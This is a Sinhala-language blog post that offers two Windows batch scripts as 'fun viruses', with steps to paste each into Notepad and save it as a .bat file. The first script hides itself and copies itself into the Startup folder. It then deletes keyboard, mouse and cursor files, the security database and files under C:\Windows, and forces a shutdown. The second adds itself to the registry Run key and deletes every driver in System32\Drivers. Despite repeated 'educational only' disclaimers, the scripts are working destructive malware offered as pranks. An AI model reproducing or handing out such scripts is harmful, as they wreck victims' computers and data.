මෙන්න තවත් පට්ට virus එකක් - Aluth Tricks - අලුත් ට්‍රික්ස්

Wednesday, August 13, 2014

මෙන්න තවත් පට්ට virus එකක්

Computer එක සදහටම දොයි කරවන Virus එකක් හදමු...


ඔන්න කාලෙකින් මම ඔයාලට fun virus එකක් අරගෙන ආවා.මේක කොහොමද බලන්නකො එහෙනම්
දන්නවනේ Virus කියන්නෙ මොනවද කියලා කොහොමත් කෙලවෙන එක තමයි වෙන්නෙ.ඉතිං මෙන්න එහෙනම් කෙලෙවෙන Virus එකක්.මේවට කියන්නේ Notpad Virus Tricks කියලා..

(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)

@echo OFF
title Your computer is fucked LOL... :0
attrib +s +h %0
copy %0 "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\start Menu\Programs\startup"
cd C:\Windows\system32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
mkdir C:\Users\%username\Desktop\HELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING FUCKED, PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET FUCKED RESTARTING YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
echo CHECK YOUR DESKTOP
ping localhost >nul
mkdir C:\HOLY FUCK MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS FITS!
echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL...hikz..
ping localhost >nul
echo Y | del C:\Windows\security\Database
cd C:\Windows\Cursors
del /S /F /Q *.cur
del /S /F /Q *.ani
echo OH NO WHERE THE FUCK DID YOUR CURSOR GO...
ping localhost >nul
cls
echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, but you're fucked"
exit

මෙ  coad ටික copy කර past ගන්න Notepad එකට
ඊට පස්සෙ save කරගන්න .bat කියලා
(උදා:-doidoi.bat)

දැන් හරි .දැන් ඒක Run කරන්න එහෙම යන්න එපා එතකොට ඔයාලගෙ Computer එක දොයියන්න පටන් ගනියි.එතකොට ආයි ගොඩගන්නවා බොරු හිහ්.හිහ්.හී..රන් කරන්න ඕනිමනම් Vartual Mchine Softwae එකකින් උත්සහ කරලා බලන්න හොදේ..

(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)

මෙන්න තව එකක් මේකෙනුත් Computer එක කෙල වෙන එක තමයි වෙන්නේ


මේකෙන් වෙන්නේ Blue Screen වෙන එක (Blue Screen of Death (BSOD) Error.....!)

@echo off
Set load=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reg Add "%load%" /v "BSOD" /t "REG_SZ" /d %0 /f > nul
Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"

දැන් හරි මේකත් Save කරන්න ම්ං කියලා දුන්න විදිහට
save කරගන්න .bat කියලා
(උදා:-doidoi.bat)

(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)

තවත් මේ වගේ fun virus එකකින් හමුවෙමු.එහෙනම් අදට මම යනවා.
              ඔයාලට ජයෙන් ජය!!!!!!!!!!!
අහ් එකක් අමතක උනා "මේ සියලුම දේවල් අධ්‍යාපනය සදහා පමණි" හරිනෙ එහෙනම් මං ගියා.......

No comments:

Post a Comment